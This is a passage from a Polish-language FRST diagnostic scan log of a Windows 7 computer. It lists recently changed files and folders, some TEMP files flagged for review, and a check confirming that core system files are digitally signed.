2017-05-13 08:13 - 2016-08-13 11:36 - 00000000 ____D C:\Program1
2017-05-13 08:00 - 2009-07-14 06:45 - 00029952 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2017-05-13 08:00 - 2009-07-14 06:45 - 00029952 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2017-05-13 07:59 - 2011-04-12 15:21 - 00739694 _____ C:\Windows\system32\perfh015.dat
2017-05-13 07:59 - 2011-04-12 15:21 - 00155268 _____ C:\Windows\system32\perfc015.dat
2017-05-13 07:59 - 2009-07-14 07:13 - 01668226 _____ C:\Windows\system32\PerfStringBackup.INI
2017-05-13 07:59 - 2009-07-14 05:20 - 00000000 ____D C:\Windows\inf
2017-05-13 07:58 - 2016-08-13 12:12 - 00000000 ____D C:\Program Files (x86)\Steam
2017-05-13 07:52 - 2009-07-14 07:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2017-05-12 21:31 - 2016-08-13 16:21 - 00000000 ____D C:\Users\Kamcio\AppData\Roaming\uTorrent
2017-05-12 16:44 - 2016-08-14 14:52 - 00803320 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2017-05-12 16:44 - 2016-08-14 14:52 - 00144888 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2017-05-12 16:44 - 2016-08-14 14:52 - 00000000 ____D C:\Windows\SysWOW64\Macromed
2017-05-12 16:44 - 2016-08-14 14:52 - 00000000 ____D C:\Windows\system32\Macromed
2017-05-12 16:44 - 2016-08-14 14:51 - 00000000 ____D C:\Users\Kamcio\AppData\Local\Adobe
2017-05-12 16:42 - 2017-03-16 17:32 - 00000000 ____D C:\Users\Kamcio\Desktop\Stare dane programu Firefox
2017-05-12 16:41 - 2016-08-13 11:38 - 00000000 ____D C:\Users\Kamcio\AppData\Roaming\Mozilla
2017-05-12 12:01 - 2017-02-11 20:49 - 00000000 ____D C:\Users\Kamcio\AppData\Local\CrashDumps
2017-05-10 07:26 - 2009-07-14 07:08 - 00032604 _____ C:\Windows\Tasks\SCHEDLGU.TXT
2017-05-03 14:33 - 2016-08-13 11:38 - 00001940 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk
2017-04-24 14:40 - 2017-03-17 15:41 - 00000000 ____D C:\Users\Kamcio\Desktop\Aukcje
2017-04-19 13:54 - 2016-09-04 08:39 - 00000000 ____D C:\Users\Kamcio\Documents\888poker
2017-04-19 13:54 - 2015-06-11 23:01 - 00000000 ____D C:\Windows\Panther
2017-04-19 13:54 - 2009-07-14 05:20 - 00000000 ____D C:\Windows\SysWOW64\Setup
2017-04-19 13:54 - 2009-07-14 05:20 - 00000000 ____D C:\Windows\SysWOW64\oobe
2017-04-19 13:54 - 2009-07-14 05:20 - 00000000 ____D C:\Windows\SysWOW64\MUI
2017-04-19 13:54 - 2009-07-14 05:20 - 00000000 ____D C:\Windows\SysWOW64\com
2017-04-19 13:54 - 2009-07-14 05:20 - 00000000 ____D C:\Windows\security
2017-04-19 13:54 - 2009-07-14 05:20 - 00000000 ____D C:\Windows\Registration
2017-04-19 13:54 - 2009-07-14 05:20 - 00000000 ____D C:\Windows\PLA
2017-04-19 13:54 - 2009-07-14 05:20 - 00000000 ____D C:\Windows\IME
2017-04-19 13:54 - 2009-07-14 05:20 - 00000000 ____D C:\Windows\Help
2017-04-19 13:53 - 2016-10-03 13:23 - 00000000 ____D C:\Program Files (x86)\ImgBurn
2017-04-19 13:53 - 2016-09-04 08:38 - 00000000 ____D C:\Users\Kamcio\AppData\Roaming\PacificPoker
2017-04-19 13:53 - 2016-08-13 11:50 - 00000000 ____D C:\Users\Kamcio\AppData\Local\NVIDIA
2017-04-19 13:53 - 2016-08-13 11:38 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2017-04-19 13:53 - 2009-07-14 07:32 - 00000000 ____D C:\Program Files\Windows Sidebar
2017-04-19 13:53 - 2009-07-14 07:32 - 00000000 ____D C:\Program Files (x86)\Windows Sidebar
2017-04-19 13:53 - 2009-07-14 05:20 - 00000000 ____D C:\Program Files\Common Files\System
2017-04-19 13:53 - 2009-07-14 05:20 - 00000000 ____D C:\Program Files\Common Files\Microsoft Shared
2017-04-19 08:12 - 2016-08-13 11:33 - 00001735 _____ C:\Users\Kamcio\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2017-04-18 11:06 - 2017-03-09 14:21 - 00000000 ____D C:\Users\Kamcio\AppData\Roaming\Browser-Security
2017-04-13 14:20 - 2017-04-10 13:32 - 00003568 _____ C:\Windows\System32\Tasks\PowerWord-SCT-JT
2017-04-13 14:18 - 2017-03-09 14:21 - 00000000 ____D C:\Users\Kamcio\AppData\Roaming\ScreenShot

==================== Pliki w katalogu głównym wybranych folderów =======

2016-09-20 10:34 - 2016-09-20 10:39 - 0000024 _____ () C:\Users\Kamcio\AppData\Roaming\icpki_sign.config
2017-02-11 18:55 - 2017-02-11 18:55 - 0000016 _____ () C:\ProgramData\mntemp

Pliki do przeniesienia lub usunięcia:
====================
C:\Users\Kamcio\AppData\Local\background_fault\aswRD.exe

Niektóre pliki w TEMP:
====================
2017-02-11 18:55 - 2017-02-11 18:55 - 0000512 _____ () C:\Users\Kamcio\AppData\Local\Temp\3d51890c7b88e4feeeed777176b46429.dll
2017-02-11 18:56 - 2017-02-22 15:31 - 0000056 _____ () C:\Users\Kamcio\AppData\Local\Temp\ac9fa174b17dc7fa9dfb079a141216e9.dll
2016-12-23 12:41 - 2016-12-23 12:41 - 0737856 _____ (Oracle Corporation) C:\Users\Kamcio\AppData\Local\Temp\jre-8u111-windows-au.exe
2017-02-04 09:57 - 2017-02-04 09:57 - 0739904 _____ (Oracle Corporation) C:\Users\Kamcio\AppData\Local\Temp\jre-8u121-windows-au.exe
2015-07-31 16:06 - 2015-07-31 16:06 - 0242864 ____R (Microsoft Corporation) C:\Users\Kamcio\AppData\Local\Temp\ose00000.exe
2016-12-06 14:14 - 2016-12-06 14:14 - 77105961 _____ () C:\Users\Kamcio\AppData\Local\Temp\setup.exe

==================== Bamital & volsnap ======================

(Brak automatycznej naprawy dla plików które nie przeszły weryfikacji.)

C:\Windows\system32\winlogon.exe => Plik podpisany cyfrowo
C:\Windows\system32\wininit.exe => Plik podpisany cyfrowo
C:\Windows\SysWOW64\wininit.exe => Plik podpisany cyfrowo
C:\Windows\explorer.exe => Plik podpisany cyfrowo
C:\Windows\SysWOW64\explorer.exe => Plik podpisany cyfrowo
C:\Windows\system32\svchost.exe => Plik podpisany cyfrowo
C:\Windows\SysWOW64\svchost.exe => Plik podpisany cyfrowo
C:\Windows\system32\services.exe => Plik podpisany cyfrowo
C:\Windows\system32\User32.dll => Plik podpisany cyfrowo
C:\Windows\SysWOW64\User32.dll => Plik podpisany cyfrowo
C:\Windows\system32\userinit.exe => Plik podpisany cyfrowo
C:\Windows\SysWOW64\userinit.exe => Plik podpisany cyfrowo
C:\Windows\system32\rpcss.dll => Plik podpisany cyfrowo
C:\Windows\system32\dnsapi.dll => Plik podpisany cyfrowo
C:\Windows\SysWOW64\dnsapi.dll => Plik podpisany cyfrowo
C:\Windows\system32\Drivers\volsnap.sys => Plik podpisany cyfrowo

LastRegBack: 2017-05-03 14:58

==================== Koniec FRST.txt ============================